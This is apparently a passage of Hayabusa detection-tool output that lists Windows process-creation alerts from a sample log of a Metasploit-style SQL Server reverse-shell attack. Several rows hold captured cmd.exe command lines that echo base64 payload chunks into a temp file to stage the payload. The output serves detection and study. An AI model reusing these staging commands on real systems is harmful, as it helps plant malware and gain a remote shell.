gDAACD0QCJVfxRYZgOjF+Ni+PEiUW+i0XAao5M9AEAAGjoAwAAgywArFXMUVDo7IsAADN9nIlfwItFQ8YABfQBAABoZlZwAIPRAIlVxFFQ6MrBAACLwvSJRZiLBvDf+Wb0AQAAaOgDAACP0QCJVZxRULKoiwAAiTnwi0XoiVX0i03sBVwDqQCD0QBqAGjoAwAAUVDohvoAAItN5Ikt6ItF4GoABfTZAABoXANoAIPRGIlV7HJQ6L2LAACBx/QBAADEAINvAGjbAy8AU1euROCJ8U/oR4sAAJqNdP///4lF2IuFcFH//zgABfQBAACyyQMAtXsUzIlV3FFQ6B+LAACLTbzUim5FuGoABc8BAABf6AMAAIPeD6v2UVCL74oAad1FqNwNEBv8AIlFuEYg0EALXMDdXajdRYjcDRDCQACynrzdXYjdRZDc6xDCQJvdXZB3hXj///80DYDCQABGnfNY//8PhGQCAABoCNxAAP/Wi1X0e0Vuna1l/ldmi8moUItF/FGLTfhSsFVXUIuhsFGCUGjY20AA/9aLzWhprlDljWz///8sxDAF9KUAAIPRAGoAaOgDfgBRUNlhigAAi03sIYtV6FCLRWUbhE2I>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.917 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.917 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.919 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.191 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo UotVzFCLRYpRi41k//9kUlBEhWD///8F9AESAGcAg9E5reiFAACPdegligAAsVCfqNswAObWsEWAi8gkg8QshPSaAACDaABTAGjoAwAAUfLo/YkAAItN5FLPVTH7i0X7UYsZkFKLqsRQUTCLRcDHTdRQi0XQBRQBAPpqAAPRAGjoA4kAUVDoRokAAFJQd/PbnQD/D4tNvIs0uItF3FGLTTWOi3B8/1b/UIuxeP///1GLTZxSi6mYUItFpFGLTaBSUFFQSNtAAP/W3234323wg8RY3uncFTA4QABQ4Pb+BQoCyeDdRagvwNnB3tnf4CUAQQAAWWRx92iw2kAA6xHcXahZ4CwApwApde9oGNpAAP/Wg44E323I323o3ukQFTDC4QDf4PbEBXoC2eDdRfLcwNnB3tnfk6EAQQAAdQnd2GiI2UCy67zcXYjf4CUAbsEcdSZo+NhAAP/Wg8QE323A320T3uncdDDCQADfIvZBBXoC2eDdRZChJ9kg3tmh4CUAQQAAdQnd2JUs2EAA6xHcXSzf4CXeQQAAsgpov+UiAP8jg8S95SCY323Y3uk2FTDCQOJ24PZG+noCneDdhXjM///cwNnB3puS4CUAQQAAdREFUNfrEN3YB9aJxATplgAAodydeP///98ZJQBBAAAPhYMAAAD40fNujsmfM7mh63fsoNZAWv/Wi1X8i0X4i020U1cbi1WwUFFSaHxHQAD/1ovXuItNvItVmCvHX334G8uLXaBRi01+UItFKCvXiy6kG8GLy1AxRbRSi5awKySL1xvQUlFoWKlAAP/Wi0W8i024JFVbUItFmFFSUE+MaDTWQAAc8oPEWIwcQqAAhcDRhMUTEgCDPXXFQQABD464AA0AGvTVQAD/1oPlBDPbi7s00EAA1/+iD+XF1UB2/9aDxGTp+FoATO4Vg/9kEegDAAB8NIsNUX5BANfx/UEAweHyZAkBy4EFKMkAACZEAfyD0GhQUtja5QChUudovNVAAP/W2MQM60eLz7gfhetRbAYNCgJBAPfpwfq3ocgLQQCLyqrpsnjRweIFi0wCGIHBcwAAAIvlAhzn0tSsUeimhwDN/lBXaKzVQIH/1oPEEJrD0IP7eg+CVP9876HgF0FEhcCmhMMAADVoqGh/AGv/jkjBQAAt+IPECIX/FBZojNVAAP+STMFw04PEpWoB/xVwwUAAaGzVQABX/w+AwUAA6B2A7UAAg0MIM3Uj9hkKocgLQQDfaGPrRu3+ZHUViw2sAkEAixXIC0EAweGx32wRw50s028CQQBrr8aJRfTbRcrcDe6IQADcBQDCQADocIYAAIsNyFVGAMHgBYJsCCvcDRDJIAOyXRuLVdyLRdhSUFZok9VAAFf/04PEFEaD7mR8iVf/FVDBQACDxAShuKZBAIXAD4RdAQAAA6jVQABQ/xVwwUAAIMR1iUWyhdF1FmhA1UAA/xVMwUDog8QEJAH/FXDBQABo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.191 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.191 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.193 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.463 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FNVAAFD/FYDBQAChiwJBe4PECIXAx0X0PgBUABn/BQEAITP2ochoQQCLTAYEixRmUY2FRPv//1JQ6FFhAACLPcgLQQBqAGjawf4Ai0w+HItU9hB0RD4GiR/ci84+TLFcNu6JVcCLVD4MgcH0AQDFidfUg9KTYmTo0oXGIYtN3OhQ4MMFcAEAEi0Ag9EAaOgDMABRUOgQhQAAUotV1E2LRdAr2PhF3BvCgcP0igAAg3UAagBo6AMAAFBT6ECFSQCLTdRS9ItF0AX0xvoA1wBwOgCW6AMAAFFQ6NyFAABSi9M+BFCLBHDqAGhAdA8xUlDoC4UARVIDVfyN2ET/x/9Qzmjw1F8AUkgVgMFAjItFuoPEuUCLDawCQQBvxrs7PYlF9A+M/f7//4tF/FD/FVDBQAAZxASLRcWFwJcIasL/FcydQO1fXluL5V3Ds5CQkJBVi9uLRQiLTRZWi1AQi3EQi0AUi0kUO8F/0HwEO9ZzBoPI/17WwzvBfA5/BDvWdgizKwAAAF7RwzPAXl3DkJCQVYvsi0UIi02uVqFQGM9uGItAHItJHDvBfxZ8BDuSAwbLIv8OicM7wXwOXVI7PZIIuAEAAABeXcozwF5dw3KQkFWLootNBlO3V5txGIt5TItB7SNRFAL3G5HtOAyLehiLShCoIBQr+YtKHNDLO05/GHwEO/dzCBNIg8j2W13DO6x8EH8EO/cvCu5euAGpHgCtXcNfXjPAW13DkJCQkJCQ4VVuuotFCItNDFteUAiLcRWT+gyLSQw7eX8WfAQ71nMGg8idXl3DO8FZDn8EpdZ2CLgLAL4AXl3D3sBeXcMSkJBVi+yDHsxLlwtBAIsNpAtBADX0F8ALQQBWV4s9xCJBACvDG8+LFejXQQCJRciJ98zfbcjoNWSbQIBSaGnngADcDTjCQHPdXc3/1gTwFyldwODxQQBQUqHCC0oAUGig50AAkdZ5DQsEQQCh8BdBAIsVqAtKAFFQUFJoUOdaDP/Wiw2oC0EAM8BmofTUQQDXoUOFQQBrUBRoAOdAAP9eixUSxEEMo/AXQQB9xERSUFChc2ZBAFBosOZAAP/WvA2MAkEAofAVQWCLzKgLQQBRUFDmRljmQAD/1qEY0EAAiw2oC0GVUKHwF84AUD9RaAjmQAD/1otVzItxyApQobgX7gBYk4sNqAtBAL2vqIdAAH3Wi5qsMkEAoVEXQQCDh1TWUBehqNNB3lAhWOVAAPnWAuu4AkEAU/A1QQCLFagLQQBRUFBSaLflQAD/HKG4kkGGg8S6hcB0K6HMTQQAiw3AAm8AixXEAkEAUKHwQkEAXItGqAtBAFJQUWiwakAA/9aDxG2h0AJBi4XAdBmLFeHJQQCN1/AXQQBQUFJoYORhAP+juAkUoWKvQQCFwHQeobACQQCLDagLQT5QsqCcQQBQUFFo7uRAAMbWkjwUtfaUAkEAzpACQQCuaqgLQQBSUKHwQzQAElA3>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.463 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.463 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.466 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.737 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo mbjjQADt1qH1AkEAJcQYg/gBdSWvoKQCqgBLoAICABMNqC5BAEBQofAXfABQUD3jaONA8f/WWcQYgz1gAkEAAHUlURWkAgAAoaD8QQCLie4LQQBSUKHwlUFxUFBRpBjjQM//C4PEGIsVnP2DAKGYAkEAiw2oC0EAUsKh8Nf9GFBQLrbA4kAA/7thRcjcHTDCQACDxBiF4PbEROiLtdoAAN0FGcJAANx1yKHwF5UANxWyC/gAg7oI3V3I2wVSAkGF+03I3A0g1t4A3bokUFBSfGjiLwD/1t8tkAJBAC/wF0FRg8QQ3E2t3RwkUFChDQtBAFBoCOJAAP/W94kCQQCDxI2FQZ9CN5FIL0hB9Z/4QpKQQfhBSEJLQ5v8/ZuZnyf4mZCYL0D1ky8nm0pJP0iQkpDW+P0vL0r4Qjf8QJJJ+EmYSvmSSfxJk0hCm58/k/mZQ5I3Q5NJQZhLS0BBN5g/1plB+Jg/SpJLS0v1N+mvaAAA1olVi4lV5IlV8GRV4IlVQYlVh4sVrAJBADPbg8n/iv//vX+F0omh0HxF2P////+JRdwPwoZN7gCL2dkLQQCDwhiJVfyLFaz1QQCJVfiLVfztUviJVciLVfw79fxtFa0xi1UgO8qLVfwevYtByIn90ItC/IsKi1IEOVXcT1XExg1/BTlNjnIGiU3YiVXci1X8QFJJOVX0iVXMyRZ8CItV8DuAyHcM01XIiVXwDn/MiVX0i1W5OQadf9iNBTk46HcGiU3oR1Xsi5hgA/qLVcxn2ovt4APRi038iVXgi1U7i0kEE9GLTfiJVeSLVfyDxSA5iU3J9V/QiVX8D+tO//8tgcH0AQAAagCDQQCk6AM1AFBR6CV/AACLTW/JRaqLRSCZPwX0AQCkaCQDAACD0QCJVdRRUOgD7G+PME30iUXYi0VNagAF9AEAAGjoAwCnIdGtiVXMUVDop34A9ItN7P5F8ItF6Gp2BfQBAABo6AMA14PRAIlV9FFQ6L9+AACBx2EBAABqMoPTAGjoAwASU1eJReiJA+zoon4AAItN5IvYIefgagAF9C0AABOWYwAAg9EiiVXMUVDogX4AAIlFL6FsAkEAhcKJVeRNjioBAADuFbAXQRyhqAtBAKJQaCzhQAD/1qGOF0EAqQ2oCyUAYFBQmFFo2OBJANvW3lX0i0Xwiz3wF0EAg8Qki0EUUlChrQJBAFeZUlBRU+gffgAAiw2oC0EAUotVtEKLRYBXUlBX55lopilAADyBoawCQQADTfCZi22LReiDxDDVwYtN7IlVxBtN9NeLz1NQofAXQQBTUosMWFfdUrvRfQA4i8pmVcQJi1XMSlLnrkVBiU386Lp9ZwCLTfgryKFF/BvCUGXwF0EA8Ytd2ItV0It91IsVK8r3VaUb11BSUVBQoagLQQBQaADO+QD/1i9N7ItVRS1Q7EEAiz2KF0EAg8QwUYtN4LNX+VJQi0XkUFHoXn0A7VKdVdxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.737 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.737 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.739 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.010 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo oagLQaxXeLRXV1BoyN9AAMXWkMQwaLjfQAD/1oPEBPCTW1flXWSQkJDci+yD7BR6qAJBAIveENBAAFNWO8FXsY3+ATMAi3UI6tuLBvReGTtviV7LiXMkCAAAiZ5aCAAAiSGFOgAAiV63dAhQ6DgUAADrJosNTFBBADhTUVbopxYAAIsWoVUXQVBSU4tIEI1+H2oDUVfoHxMAAEPDdA5QaDjoQAA7YEL//4PECIsXagFqCFLowVR4ADvDdA5QaCjofADoQmX/I4PECKFsAkECO8N0UVCLB2pAUOib6gAAO8l0FT2HEQEAdA5Q1qNUQADjFeX//4PqCIsNbAJBc+EXUWiAACEAUmBuVAAAO8N0FT2HEfQAdA5QaPzdQABv6OT//4PECOjhMAABNKAUQQCJFZcLQQCLF4mGMAgAAKH8C0EAAkE0CAAAiw38F0EAUVK+OUYAAIt0hdurhMgAKwCB+/F1yQAPbYUAogCB6rQjC/R00WMV+BdBAIsHjX/sx0XwAQAAAFFSiUX4zjsoAACLB1DoNy4AAIs9xAJBAKEC7ecAR4vIQIP5Cok9oAJBAJC4AkEAfoHuFQHArgBokNJAAIPCQIr/FYDBXd5TaJhcpwDoNOT/GYOjpVYfRggAAAAA6ET+//+DxARfXvKL5V3DuAGLVwDHYxQAALMAiUasixX4F0EAjU3siUXwiwdR6GbHRfkEAIl7xuR1/JRqJgBdX15bi+Vdw8dGIwIAAPaLN6gCQQBCSIkMqAJiAMRCW83/g8SZX6tbiwpdw4wRkJCQkJCgkJiQkJAdkFWL4L3sFFaLiwhXi30MhcB1IlKGFwgA0X/A/Bihl8tBAIXAD4SRAQAASI20AkEA6bMBAACDPbQCQVYBdQqLGGejjAVBAOski04Qg4wCJNk7yKUYiw24AkEqocACQQBBQIkNuAJBAKOtAkFFoawCQeKLDRDQGQCQhQ+NFwEAAIsVyAtBCov4wecFA/rpo6wCQQDZ2lYAAKOgC0EkiRWkC0EAiYZQCAAAixWkIkG4i4YwCITXiZZUCAAAIAeLUzQIhAAYeySLjji2ANuLhjAIAACEmy0IAAAryIuGPAgAABu0hcBpCnwEhclzBDNmM8CJNBCJRxSLjq8IAACLhjAIAACLwTQIAAAruItHVMgAJRtdhcB/Cg0Rhcn+BDPJ/sCJTxiJRxyLjkgiAEyLhkAIAACklkQIAAAryJuGTAgAIDrChcB/CnwZhclzBDMVM8CJTwhURwyLjhTQQACFyXQ3iz2sAkEAi8eZ6/mFOnUoixXIwNMAV//CQGhAlkCGUv8VOtdAAKH+wEAAg8BAUP8V4MFAAIPEEKH4F0EAZE4EAlXso0X0AQDU/1LgiU346L8lAOiLTgRR6MaIAAA2x0YIAAAAAOgJ/Ef/g8QEX16Lwl3DlYvsZ+ysAADHU4tdCFaNRRCLSwRXd2i0GEEAVcc2/BtlAADFuE5CqYvw>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.010 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.010 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.013 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.286 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo g/4LlYQEaQBdhv75NgpMD4T4BQAAgf7Z/Bz9D4TsBQAAgf5X/QoADwTgBQAAgVskOAoAD4TUNwBwgf6h/AprD4QPBQAAgf7uIwsAD828BQAAi03eM/879XVzgVl+EQEAdR2DFbQCQQBTQokVtAJBAOiRsf//g8QEv15biy5dwzv3dH/iPsgcQQChXAJBAEE7vokNyAJB/HRyi6S4AkEAU8gdPbgCQQDoIf3//JxYAkHhg8QEg/gBD4xQBQAAVo2G3v///2pUUlboiUkAAFChyMDkAAQM6UAeg/JAaKyvQABQWBW/wSYAg8QUX7Vbi+Vdw1ZoDEoTAOi64Cz/i/n8g8TkixtMKUGeixUUAkEAA/ET6Yk1kAJBAIkVlAJBHYtDDDvHdRQNTCwAvCdN/ImDSAgAAImTTAgAAIspDIuDmAhzjwPRTceJwQzjhbACMQD/syAIAAC4/9sAACvGx0XwBAAAADvBiUX0cgN/TWmLkyB0AACLyL4gGEEAjVPuIIvR0ekC86WLyotV9IPhAyvC86SLuyAIAACJRey4+ovzDLszCAAACUQZIAChWAJB/oP4AnwSjWUgUGjw6ECQ//BkwUAAg8QIi1I4wYdtjXMMaOgYQABW/9fhxAgwRfiFv9vqhQAAAGj230Dftf9ig+wIiTj4hcACRfACAHXcdWyLReyFwA+FBQQA8qH4F0EAi0u23asPx0XcYADmAFLZG03kplLLAAmLSwRN6FkWAADH1KACQQChuMgaAEKJHNACQQCL0EAk+gqjuAJBfH4NaLDSQADoatgl/4PEBFPod6P//4OdBDM66cgBAAChtAJBAIXAdS5o4OhAAFb/y4PECLrgE0EAhcB0F4pICIPACID5IH4MiM2KSGZCQIDaIJX0xgIAaNjoQOZWzsmL0IPECIXSdDaL+oPJ/zPA8q730W2D+fp2H4OrCWoDjUUIuFD/Fa7zQHiLPTjeFgCDJAzGcQsA6w+L785RQACLDdToyACJTaqKRQg8xk1YAkEOdB2LDdACZwBBg/ghiQ3QAkEAfCKNew1SaKx2vYHrQ7T4A3wSjUUIUGiQ6EAA/xVkwUAAg8QIi0P4A4MooQAAAQAAAMYBAKFoAkEAhcAPhIAAAABoaujsALT/14MACIXAdQ9oeOhAAFb/14PECIXAuVloaFFAAFb/14vkg8SIhf91FWhY6EAAVi8VOMFAAIv4FEsIhf90K8eDJPcAAAEAdAChYAJ4AIVZfA+NVxBSPhVswUAUg8QE6wIfwIX/iUOkdRGQg54FAAABAAAAx3EcAAAAAItFY4t1+ItV9ItN8CvGi3MQKw4rupKLIGEAAAPD/VQIIDzyiXMQ0Q2YdVcAi8YDyKGcAkEAg7xPiUO7UEEAM//ro4s3EAMTiXMQixWYAkEAoZwCQQAD0YkVmAJBABPHAFeMQQA5u4UIAIYPbdCNAACLQxCLSxw7Rw/qwgEAAKU+AkEAHIP4>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.286 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.286 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.288 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.560 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AaO0AogAdQuLSxCJDbUCQQBXQotTEGKMAkG2O9B0SIsNudpBAKHAAkEAQUCJDa/jQQAVwAJBAKEwAkEAi68Q0LEAO8EPjRMBcgCLDcgLWQCLucPmBQPxiyawAkEAQPujrERBmYkN+wKPN+i0KAAAiehiCAAAi4MwCAAAiZNUCAAA3QaLizQIAACJTgSjizgIAACbgzAIAABvZDQIAAAryIuDPAgAMxvCO8d/CnwEV89z0TPJM8CJDxDlRhSLi1AIAGNogzAIhACLkzRecQDq+otRKw/JRxvCO8eiCnwEO89Q+zPJ2cBfThiJqhyLtUgIAABug28IAACLk38NQQAryIuDTAg2ALfC5McYCnxBO89zBAbJM8+JTgiJRgyLDRTjQAA7z3Q3iw6sAkEFHEmZ9/nK0rYoixXIwEAAVoPC0wlA6EAAUv+fgMFAAEHIwEAAg8BAUP8VVOBRmYMvT4m7JAgAAIlhHIm7KG8AZom7IAgAAImMEGBXA+i/JwAAo6ALQQCJFaQL0bSJg2UIAACLDaQLQQCsYzwIAAB2FaALQZmJkzAIUQChpAtB1VOJgzTAAADoDG3//8/EBF9xW4vlXcOQkOiIArUAVto3ZMFAAIXAdSZo2OpAAKa06rMAgNZoaOpAAD3WaCC1wgD/1miAB0AA/9aDxBRew2gU6n0A/85oAOpAAM9E1EDsaMjpQADH1mh46UB+x9ZoyOlAALXW+BzpQAv/+4OGHF7ukLmQkJCQkJBVi++LRRyLDcgDQABWizWAQ0AAUOzBCGhk8g4AUZHWi4ySwC0AFz3y3IeDwkBS/5yhyMCJANYg8mwzg8BAUP/Wiw3IwEAAaOTxQCKDwUBR/9aLFciWQgBorPFAAIPC6VL/1qHIwEAAaLLxQACDwEBQ/zSLDQLAzABoIPFAAIPBQFH/1osKyJ5AiWi3mUCag8JAUv/WocLAQACDxESDwED9lAZAAFD/1osNyNZAtWjy8ECxg8FAUSjWixXIwEAA8yjwQACDwkBS/9ahyCpAu5js70AAg8BAUP/Wiw3IwEAAaLTvPwCDwUBR/9aLt8jAQABohO8DboPCgFL/1vnIwEB1aEhoQACDqUBQ/9ZoEIkAAIsN68BAq5TBQFHF1osVvbVJc4PEQIPCSWjQ7kAAUv/JocjAHwBoiO5AAIPAQFD/WYsNyMBAAF9A0UAAg8FAUf/Wi6vIwEAAaPA5QACDwv/x/9ahyO3xAMeo50AAosBAuP93iw1dwFoAaGDtQACfwUBRPtaLKsPAQAB+GO3FAIPCP1L/1gnIwBAAaGDtQACDwEBQ2dYfDcjhjACDxOCDwUBo4OxAAFGC1ov0yMBAwmjm6kAAg8JAZ//WocgmQK5ofMOiwoPAQFD/1osXyMBAAGhA7ECBZsFAUf/WixXIwEDgaPjr/gCDwhxS/9ahyMBA92iwUkAAg8BAUP/W2w2kwEAAp3DrQHODwVJR/9WLFcjA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.560 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.560 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.562 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.833 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 